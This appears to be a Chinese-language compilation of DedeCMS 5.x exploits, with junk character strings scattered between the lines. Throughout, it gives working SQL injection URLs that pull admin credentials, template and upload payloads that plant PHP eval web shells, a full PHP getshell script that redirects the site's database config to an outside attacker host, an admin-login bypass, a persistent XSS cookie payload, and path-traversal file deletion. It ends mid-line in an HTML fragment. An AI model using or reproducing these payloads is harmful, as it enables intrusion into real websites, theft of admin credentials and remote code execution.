|
|
! ~4 h3 i% |! A( m
Dedecms 5.6 rss注入漏洞
& p) E4 ]! u+ T4 Ghttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1* u$ h/ |: N6 r( k ]
) a" b$ h- e& k* N6 ~* f- P: J
|2 E, l( `: O" ]% G( @6 |' ?" x9 ~% Q" ~+ s) d
/ a6 y' p# p+ e6 K( U% x8 o% p/ q6 D9 p2 S7 E9 A N
2 O1 X( J$ W1 i( P3 m
L4 e6 e* {+ e9 V/ p' F
, E R% q( P! L1 O" bDedeCms v5.6 嵌入恶意代码执行漏洞9 }% x- m* M$ n
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
; |5 i5 y J" J3 E发表后查看或修改即可执行
% h+ c3 C. e9 \' {; X7 Qa{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}4 e( y. e' @7 p' H% y& Z
生成x.php 密码xiao,直接生成一句话。
+ o* d% c. H! b! u0 m! @
0 ~+ r- p, M; L1 ]- P3 v3 U
f7 F3 G7 {- |' K5 u
( k! r+ K( K- m, O/ T* w4 p/ {% W/ y1 v/ {7 i8 I! z
: ]* Y- \+ T7 ^% T, u
# v& x' s) b0 @" }9 p8 m8 W
% W( q8 U! u0 H1 Y$ G- E
W: s+ M1 I* B5 w. _+ ZDede 5.6 GBK SQL注入漏洞
6 K* d, ^0 h& W2 Zhttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';6 D3 u% n/ A# I! p H! Y, o& S
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe$ x- }6 ^0 [/ A
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
$ o8 s% h5 N: @$ ?3 r. M" V& p. S( w
0 t$ r! h/ L* x" g( G' ?3 e7 p7 r. T7 G
* g( y" u, d: i# X
# U" `% Z& \. p' a6 e2 E& i3 U. X# O m2 n# r/ m2 H1 Z
1 g5 W3 o, u( p. |1 J8 C
1 ~% y( H; S4 s5 \. C9 Z9 \DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞; G1 e8 F0 u5 @( ? x0 I5 ~
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` 3 k' o7 s) q7 z% A# s8 t
" @( F' E6 O4 c# J! H3 s+ _6 e# w6 E( S# n7 L' D" X2 {: P
4 ?3 {# Y6 M0 e& k- P( [+ g
. X# P7 x. e, J1 V% z- g
( {4 X4 g9 N" B; K2 @& Q x8 l( W( K- h5 \
DEDECMS 全版本 gotopage变量XSS漏洞
; T/ p" d6 I1 a# m, [1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
! M& ^& r8 M% Qhttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
6 I' A" ~' u. M. J8 ]% w9 c: F
2 D1 }" E( [2 \1 D0 U1 ~9 ?2 i; q6 S( M! O6 Z4 [+ N, I
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 . {( p# u* K" s: X* e" L0 N
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda; l1 t4 F& I; T, _ Y3 u7 _% v1 a6 F
5 V5 R. J6 Z# m1 e
; C! x* X: U5 j/ y& C0 d4 _http://v57.demo.dedecms.com/dede/login.php
5 V$ L/ C$ E) g" q1 L, M, r, V8 u5 p( _1 ^
. T2 S3 u R* _, R! ?
color=Red]DeDeCMS(织梦)变量覆盖getshell
9 K, D; m7 t* g+ M" Q! _; {/ H#!usr/bin/php -w
4 w) y! ~+ N+ z7 ^* b F+ r4 g<?php! ? S8 P5 C$ O7 c+ V
error_reporting(E_ERROR);
8 I( c- r \1 ]/ C- _# z& Dset_time_limit(0);
& g5 E" q4 y) ?1 O$ D7 Eprint_r('
! T6 u; K3 F: XDEDEcms Variable Coverage2 b4 u Q7 ]" B4 c6 z
Exploit Author: www.heixiaozi.comwww.webvul.com
" a2 y+ F, P: }+ b/ l N4 T. });
# V, q y1 U* a/ q1 e3 E$ recho "\r\n";
7 \ L; i& O) q* |4 Iif($argv[2]==null){
1 ~$ k. r; @8 ?, m7 ^+ tprint_r('$ s( v. k5 k H# B6 y( U8 p. R
+---------------------------------------------------------------------------+4 R0 N. ~# a& F
Usage: php '.$argv[0].' url aid path
r2 l$ r0 Z; s: N3 @aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/. L' E) ^( v* o# E. M+ y
Example:! \ [5 ~9 O% \1 ]3 P6 R
php '.$argv[0].' www.site.com 1 old
2 }" R4 m4 t- M4 y# `+---------------------------------------------------------------------------+
' K8 G7 P1 ~ ?) P');5 Y( O" a3 L* z/ i
exit;
% \, A( ]( f/ Q* f3 ~& {}
5 M5 ?( X9 S) @5 a$url=$argv[1];
6 g& V/ }& j8 f! g+ c' z' O% e% \, a$aid=$argv[2];" p% k( e; e0 D9 V
$path=$argv[3];: x. t9 {& k! L7 s
$exp=Getshell($url,$aid,$path);
* S) P' Z$ X, G2 nif (strpos($exp,"OK")>12){- A. w& g. T" B6 T& n# t
echo "
h2 u* s7 N+ YExploit Success \n";
0 f6 v4 `4 X4 G& y$ }# B% n. t7 }if($aid==1)echo "9 s) ]. H, m6 Y6 O* O+ z
Shell:".$url."/$path/data/cache/fuck.php\n" ;# E0 P! N# C g2 ]5 K
; {4 h5 G. E- t ~% l O3 V* }
0 }' h6 m, C: n0 C/ T
if($aid==2)echo "$ R( `. N, s: i7 F7 B
Shell:".$url."/$path/fuck.php\n" ;
% p# V! f* L8 y! B0 B( C2 B) K2 p6 B) r8 q1 M
$ e* P! r. S! H3 e( D' f$ V# q
if($aid==3)echo "8 p# S% ]1 U& v! A) |& S
Shell:".$url."/$path/plus/fuck.php\n";/ r7 e& X. u1 J8 J b# P" T
( V, } \/ g7 j. l% y
" R4 w$ ^8 U+ g" q5 o9 ~}else{
6 w" G/ G3 m8 R5 ?/ t [8 E* q: T; secho "/ g. k; P/ {- W) a
Exploit Failed \n";
" _1 L/ X2 P4 y- u}
$ T) C6 t7 U# L2 a5 v8 T0 N3 R4 b4 nfunction Getshell($url,$aid,$path){: R( ?1 ^6 Y3 l! N
$id=$aid;5 n$ v: M0 _, P; F
$host=$url;
: z/ S2 e7 Y }* j$port="80";
6 V a0 b) V' Y$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";% E) |- C( |0 Q9 u6 h7 h% K% d. w1 x0 o# v
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
% F: Y- p- b; G+ g9 B# Z$data .= "Host: ".$host."\r\n";
5 t; O% T0 T! n& z5 q$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";- i$ p3 l0 l- [
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
9 @, V" C1 F/ L# s7 U$ s& E$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";7 @0 I& I) t5 i# @4 Q, e+ z0 F4 c, q
//$data .= "Accept-Encoding: gzip,deflate\r\n";. S# {! m% i0 B( `
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";7 I# R7 O; f8 ?% f1 `) u* h9 s
$data .= "Connection: keep-alive\r\n";& _% v2 S# |$ ]0 M5 W# h& b+ a
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";2 t# L0 h; B3 e' {6 k8 z& F$ `- B
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";: P' g$ k6 I* m! V: y
$data .= $content."\r\n";
! G8 p1 s9 o8 v0 r) Y9 I$ock=fsockopen($host,$port);' p' U% _, P, c8 d3 H
if (!$ock) {
, Z# W( O+ o/ x" q8 w j$ N. lecho "( ]. k; c0 }6 P1 V# c* K
No response from ".$host."\n";
/ D/ a c, A6 b( @% ] k/ O. |4 h3 t}$ o, I( }, E8 {. \
fwrite($ock,$data);
! j! Z9 l# _" ywhile (!feof($ock)) {
) e" w- }- P/ h" K$exp=fgets($ock, 1024);
- C* y1 R1 `+ J) sreturn $exp;
3 f$ o% q4 P3 R% I: K6 e# C9 j}5 d; \$ Y4 A; b, ]: J/ _
}7 \$ G( k" T1 H. _* k( [5 c; R1 V
# {. f* m ]2 i' X6 F( T: t- d# a7 @( i: a w
?>7 n$ _& x& N: z. M" B$ [
+ h# S: c" n5 b7 r& {$ y" O L
4 Q" L8 ^ z( K# q3 P8 w& q F8 i% _1 a# b ]
/ W5 g+ w# X) R* h9 o
. ?$ e8 |/ u) S! {6 U2 O
8 Y9 C/ y1 g+ k' x
) a+ I& @$ B# W+ X$ O. t
& `' }1 f( s O# j6 m# a
' ~/ v/ [, ?. w* x
: m4 A# w' C( RDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
( \' K# i O& P. ^4 u8 B" Uhttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root0 x$ w0 ~7 ?& U$ G* Z7 ^8 H- P
8 e7 A5 _" A+ n: M0 z, `1 u" N
8 I7 b* z- L L) L, i把上面validate=dcug改为当前的验证码,即可直接进入网站后台$ K8 j7 u3 M; H* o7 E4 u! C7 {
% s" b8 k. N: T; f2 K! ~# }' e2 T% }* m
此漏洞的前提是必须得到后台路径才能实现
% m1 K9 H9 }0 k6 T6 @3 ~
. }- g3 H- V( f0 g- d0 `' x$ Q5 E6 l
V* P4 ~4 e. r+ l, `6 H2 ~9 k' P: B
, O+ A) c0 U7 m* ^# y9 D9 l2 W. s$ F" _) E1 H9 G8 t1 {5 F! I
- z+ `1 h9 k8 L/ i
2 k; m, @2 P. V* ?% j( a. G% ~" J. N, U# R" ?9 ]. ~; P
) t3 h4 v3 x6 f2 @/ e/ P" q
/ a* O: o5 Q5 y! X% c: m7 cDedecms织梦 标签远程文件写入漏洞
3 Y; {- C. j6 V3 ?+ E# B p) x- M前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');1 `- Z+ b' a- R) a
; k' ?3 K' |$ _
# C0 Z, z8 M: }6 o5 ^再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 # T, [# f; g9 r: l7 V, F
<form action="" method="post" name="QuickSearch" id="QuickSearch">
6 k# }9 e( B# j/ w0 v3 z<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
7 g8 ^4 u; f# [$ v% D- \* c<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
T) \; m8 N, @( r) N# g/ b8 O<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />7 C6 j, F) _5 c
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />; k1 B, K0 R; g) S
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
o& r+ t5 L( ?3 G; N<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
/ V2 N" d/ g# j$ h0 m5 P/ T<input type="text" value="true" name="nocache" style="width:400">. ]5 Q/ o# J; m
<input type="submit" value="提交" name="QuickSearchBtn"><br />6 h+ G* d& R" y& X% z7 U* D' J
</form>; M8 k: l+ B: p7 w- @
<script># P5 ?. Y5 U6 \. e8 k
function addaction()( ~% I1 \% ?, K, X `9 r
{
- U" x) E8 ^; {0 B5 g! Kdocument.QuickSearch.action=document.QuickSearch.doaction.value;
! G5 i- q/ n" u, ?/ \6 H}! ]* `4 Y* z+ Y) l
</script>6 [8 ^3 y' [* @6 \+ d5 O7 w
G" Q0 `" `; i' e1 |- t+ k1 z2 Y
, k1 x1 l- w7 J$ [
% Q4 a3 i1 V" D
[ n- p6 p# Y# `& Y0 W; M ~& H; O0 \: X# i% J6 r0 c
9 J8 Z8 {' B; \% P W! q
5 m3 F3 f; |0 C! v% Q5 k. t
R8 h+ U9 b# }" S* [' I: f: g5 |) \3 W& D% \
+ c: \( E _" V( ?$ ?DedeCms v5.6 嵌入恶意代码执行漏洞
' W6 X$ \. H/ d) q( p注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行$ a) [8 U2 l" o: ?
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
% v! f* ~% D2 K, p/ s* C7 F/ }, u生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
% |* Z# m2 S# L) G5 g# C5 r( BDedecms <= V5.6 Final模板执行漏洞) p8 V& s: O" I2 U) b" l X
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
/ Q7 L0 s0 K- |$ luploads/userup/2/12OMX04-15A.jpg
- w* ^" Z6 |2 r* z1 H. v+ f3 v( g! ?6 \
8 f8 I6 J/ L. Q: O8 n( U
模板内容是(如果限制图片格式,加gif89a):- g7 P# r" [) f2 M8 F( ]7 q
{dede:name runphp='yes'}0 l6 b6 K2 M. v
$fp = @fopen("1.php", 'a');" w1 C$ `9 F( D7 M
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
! l/ }. O$ X- F, ?" L; I@fclose($fp);% P, u% O7 }" h; }9 A6 P; r, q
{/dede:name}/ g# j, T, q2 m4 [9 P2 w
2 修改刚刚发表的文章,查看源文件,构造一个表单:( O5 b; d/ T, Z- V- t
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
8 n+ D* i( L$ |! u8 S<input type="hidden" name="dopost" value="save" />2 ^& L2 a+ I0 c: t2 \0 A8 C+ n: O
<input type="hidden" name="aid" value="2" />
4 b+ G" \! O3 t3 f% b<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" /> r/ m* {! E" x2 _" V' K+ M
<input type="hidden" name="channelid" value="1" />
G& L# M* e9 }& U<input type="hidden" name="oldlitpic" value="" />4 `+ k1 A8 O. |# @4 A
<input type="hidden" name="sortrank" value="1275972263" />
4 }1 a3 z# q4 D+ \4 \# U" C. C6 D% X# F/ f* M8 X, `- N8 {! O+ z
4 s8 X$ r, M7 ^0 Z0 J4 B/ l: V/ ?
<div id="mainCp">
; j! i& O! w. R<h3 class="meTitle"><strong>修改文章</strong></h3>
; g% x- o o! b( [+ {7 E
% o3 y: }( V& o: j
+ P- Y a4 a. E<div class="postForm">6 F" {6 u) F+ q; d/ B* `+ c
<label>标题:</label>- X, T, }2 B: C
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
' v) U; N* c1 |; m1 M
4 H2 t; z2 I! Y' A/ D, |6 r1 X
7 I% ]8 b; g. L3 o<label>标签TAG:</label>
3 M: W! R+ n$ d7 a: R<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
. n; k3 l$ g/ N. _6 A" B! C
6 S" c; g9 H" U' u0 B F. k" R" ?! a) c7 z2 b! k! N3 n! `+ ^1 G9 G
<label>作者:</label>
- f! Y5 B- V7 S/ u' F<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>) Z9 ]2 r O( t9 y
' x4 O; ]: F7 h8 [+ w3 a1 t
2 r3 B% Y0 d3 U- Q
<label>隶属栏目:</label>
4 f" L' `2 o* U6 r<select name='typeid' size='1'>' d2 g) y: x% K* g5 H4 t6 m/ h& G- @
<option value='1' class='option3' selected=''>测试栏目</option>; b N. M6 I- N/ ~+ I
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
/ G* O0 Q& f5 h" }, V3 I' Y" l! m' J# t* Z7 s
: z0 q% s7 B1 r9 n8 V8 C4 J* O. y<label>我的分类:</label> }% \: z6 ?1 S( H5 H4 j
<select name='mtypesid' size='1'>: D+ V l0 z6 p; l8 t
<option value='0' selected>请选择分类...</option>
1 A" o9 p% P/ c4 l; @" F8 o<option value='1' class='option3' selected>hahahha</option>8 I7 m! w$ v2 k
</select>
0 O; K7 t6 E" A- {( s; A; `2 ^. r- u8 }% o+ u
3 ^6 ~4 a s0 F6 c+ s" D" d& ?
<label>信息摘要:</label>: O0 P | m) d# i- J3 o
<textarea name="description" id="description">1111111</textarea>/ v- q3 _9 p3 ~! ^- S+ A. c3 I0 I: w
(内容的简要说明)( U6 e7 n3 @2 E2 J, w z
: N' q. X$ S' @
$ G3 N+ g3 ?+ K1 |. l<label>缩略图:</label>- g- V& s9 M) |9 t+ s
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
) ^2 e, ?! w) y$ @ H
4 T! P7 {5 J' x, `) n9 j7 f# m5 @9 i( F+ z+ E" d% Y
<input type='text' name='templet'- S, v' C; X# e ]8 M! f
value="../ uploads/userup/2/12OMX04-15A.jpg">/ c8 x# B2 J: n# d
<input type='text' name='dede_addonfields'6 f- v0 a$ [- z+ c# }
value="templet,htmltext;">(这里构造)7 h8 ]3 s% I- e' @% C
</div>
& ]# a4 \1 R! x' |% k
: a0 c4 V' w T3 H3 M: e( P
6 Y- s4 J, n% R: I `( K<!-- 表单操作区域 -->0 L( M- {# A3 y( M& l
<h3 class="meTitle">详细内容</h3>
" }% t% }- n3 m- p7 T+ u: i9 ?. j
% L! L) a3 [- j, ]2 h5 Z) G: v6 Y; r& q* n
<div class="contentShow postForm">
) v B7 Y8 n G6 f* d7 r<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe> @/ q% n3 T% X0 V: I
, T9 I5 n" m" x$ q% x
6 s. t* ?0 H6 F) [3 \<label>验证码:</label>
4 ?6 c# e/ v# e/ `<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />" ~8 _: X5 J0 E' w- K+ ^( `/ c4 x
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
, ?9 X7 d4 \$ w" f5 n2 T, S4 K, F( @+ P% E4 D
! p4 |1 O7 N5 [5 m" |
<button class="button2" type="submit">提交</button>
8 ]+ t3 b( Y& a<button class="button2 ml10" type="reset">重置</button>; M5 i8 l& d" A! @# z
</div>9 p( w8 [/ Y: G$ b
1 V6 \+ j7 B: q& v: {: P( w% P
V4 m3 l6 M0 H* Q</div>
# M* J# y5 P; [. X3 I
( k+ P' u* l! m# }2 R, ^' P; x' ~& j6 g) ^1 ?
</form>
2 o9 l. Y' D' d( o8 S. ] q7 \0 f8 G& W# a# `, Y2 J# ]
4 r. b+ W9 p# s7 O X提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
% Y# @) e7 [$ E1 M0 N假设刚刚修改的文章的aid为2,则我们只需要访问:
. m; L2 S3 s$ e; Uhttp://127.0.0.1/dede/plus/view.php?aid=2
+ V3 t: r' w- E4 {1 U7 V$ f, ^即可以在plus目录下生成webshell:1.php( X; k- ?- t0 p4 o" K! I" x
& ^! E$ P7 y+ A% M
0 g* E; B4 [* Y: \1 U" \$ b3 P' c x, D0 \+ p
: u T7 } W, P/ k
$ [) r' S7 r2 E& |0 Z4 F% b5 p E
- J0 ~3 N& S5 j- N/ X! ~
- }8 i4 m* Z5 k& z$ E3 t$ U5 a- b" P1 j ?
5 v/ S/ P7 N) g- }/ c: H8 b9 t" r" S0 U7 e0 a3 W( B
" g: B( D7 m7 I# U4 N$ A$ D! N# H
/ H* s, ~! m% Q0 x/ I
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
) Y' t5 q2 C& S, }. N0 T) lGif89a{dede:field name='toby57' runphp='yes'}, p5 Q8 \3 O7 t9 l$ F
phpinfo();
K B1 S5 @& W) P6 D{/dede:field}
' q9 Z$ D U4 {# s& i1 p保存为1.gif7 A$ l7 X$ X0 q3 a
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> 8 q6 l( i; C8 E) n
<input type="hidden" name="aid" value="7" />
+ A; S" g& O( C' V0 {<input type="hidden" name="mediatype" value="1" />
/ r; @4 ^7 Q1 b9 u- e' S<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
/ h6 i4 U! u1 b( }<input type="hidden" name="dopost" value="save" /> $ C# g& P9 u8 @: H& t8 S3 Q
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> : h( J/ I! z# Y1 j$ m4 k* L
<input name="addonfile" type="file" id="addonfile"/>
z- ?( ?* o. W8 ~<button class="button2" type="submit" >更改</button>
" Z" }3 q' E6 c2 _& j</form>
$ i2 K3 l. P, L
& m3 y p: K6 u3 i: J
/ _: P$ B# G$ i* Y构造如上表单,上传后图片保存为/uploads/userup/3/1.gif# }0 G5 ?2 e. I4 z- f
发表文章,然后构造修改表单如下:0 }5 ?+ q' K+ R, Z
) v; s: Q% N4 }; J' O* w( ~0 H
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> 3 W" W) R3 _5 f; B
<input type="hidden" name="dopost" value="save" /> , N5 q0 R2 Q% k$ u, q
<input type="hidden" name="aid" value="2" /> : W3 q7 g% ^/ Q6 Y% j+ \
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
5 ` p( t3 Q8 `4 b3 `: u<input type="hidden" name="channelid" value="1" />
, p1 V& w* P( D' S9 ?<input type="hidden" name="oldlitpic" value="" />
- j: X2 H. Z7 f- D0 T! \( s<input type="hidden" name="sortrank" value="1282049150" /> $ ^* ?+ X0 c" o! u8 H$ c
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
2 J4 p, G- Y/ w. k4 |<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> 9 U+ j, t. G$ O" B0 y) w) S) T
<select name='typeid' size='1'> ; [( n1 V: O) d) f7 q
<option value='1' class='option3' selected=''>Test</option> ! r$ X: n8 { n; K9 t7 O
<select name='mtypesid' size='1'> : A+ I" K, V1 U
<option value='0' selected>请选择分类...</option> . [5 w) ]- \- M) W3 Y
<option value='1' class='option3' selected>aa</option></select>
) F* S% n$ w0 q, a7 T<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> ( E& ^( ? n; t) X% z
<input type='hidden' name='dede_addonfields' value="templet">
% [7 a$ Y( P, P5 ?# Q( O7 p<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
6 d* M5 C% Y' X' |. m<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
+ e! C( {2 ^8 p h' d# }<button class="button2" type="submit">提交</button>
- M+ }+ U" @$ t$ _; A0 }</form>
, C9 s2 @! }$ Q( [6 @- ~5 ]6 J- t, u% C8 D1 J
; A: ]3 ^- q9 x0 T+ `
7 \. p' C) `; v/ K/ P5 n+ i9 A, k0 g: i( r4 p; \% L8 |4 u, V. I" j
# c& @) G+ s V5 B/ C2 w$ O
& Q- S# m4 z# J' X. r- q/ u
1 R! D a) x0 _, E% V2 ^( d6 k0 U# I, A7 z* W' U z; \
) g# ~, o1 U& N, Z8 m
a3 z( r1 X+ y/ I! u- C/ S
4 U: ^( ] o# S, G! f1 W+ ~8 o- u
% Y+ z U! N. A& p# y5 M
织梦(Dedecms)V5.6 远程文件删除漏洞
0 W L: c, N1 K/ m* j1 Ghttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif4 M/ {% _# y: A. C
' t( |2 B, N( ?+ g/ f. L7 K: G6 N( X1 `; G
: P7 C9 b$ s! Q+ K+ i9 o$ x3 m) J
$ |7 r. z- t* E+ ~2 G: ?3 B8 c" b3 K1 k# D: |. W- N; o* I& R- b
, v" S8 B1 `) \# P2 |+ t4 l% i% A
- @; F# Z: j9 f1 l6 A" Z0 I a
+ C' A; ]+ q3 `6 S/ t( F
" z7 o9 ^1 _$ C5 y
7 L* u* d9 V$ U @+ V2 G7 ~织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
3 M; J" @3 |. F4 [( l5 m# L& Vhttp://www.test.com/plus/carbuya ... urn&code=../../
$ z/ I: D* q! l" r
# d! B! t) Y8 i& {7 Y3 c
" [5 g3 p+ W- H3 I2 Q: w" s
" ^ B4 h0 E: j6 Q$ L/ A5 R ~$ w' q, b7 w; \/ v* q
. H8 h3 l! [8 g. f- d6 }4 ?1 t7 S2 C; a( ?
$ H a5 u7 V) g3 Y" e4 p9 }1 \* g
; A! O* W# ?' f6 U) c+ K/ q. [2 t8 d! Q8 ^
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 ! b, g* f. I9 l. E9 ] L
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`) Q( ]$ d; w; O1 c' T
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
+ i0 b1 m5 ?4 v" R1 H! C# ]: D+ s9 Z2 k5 N) X
: J% n+ z; [% O; p5 b
8 c. n3 g! j8 _$ J) s+ D- R
. N) }$ k o# p- v. Q
' H- h1 y% |# \# O0 c4 j! }( y9 J+ i! Z
7 E; \: u; i; z) A8 a8 ?/ P
4 c Y7 z: a! v3 W
. S6 t: @# s# R3 ?/ l5 G) b3 _# a _9 p
. q5 b# Q" u6 B3 A, }) n9 ~: Z织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
% @+ T3 K3 p; y. rhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
- B/ T5 [1 c2 @: M6 j7 Z: R2 Q
# T2 p4 X+ w% ~. r- `' _. {! v7 Q V
5 g6 Y; T' h' y* B
2 T5 C0 a: X3 U: U+ t
5 B- D7 z1 L& }" V: q) E4 k
# W" N6 U2 m/ ?0 B/ ]9 n" r4 d- n B; [+ v1 M! l2 ?! f& R. `6 f
: F9 V0 ^) @1 u$ ^! \
! i( U& J4 y4 m0 i+ P; r6 [6 @) }6 U0 B
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
5 u% I' R( \% y3 t+ G; T<html>5 B+ M# V& x/ i# b5 d) a
<head>& g4 O5 }$ N$ M. B- \, G7 A" [
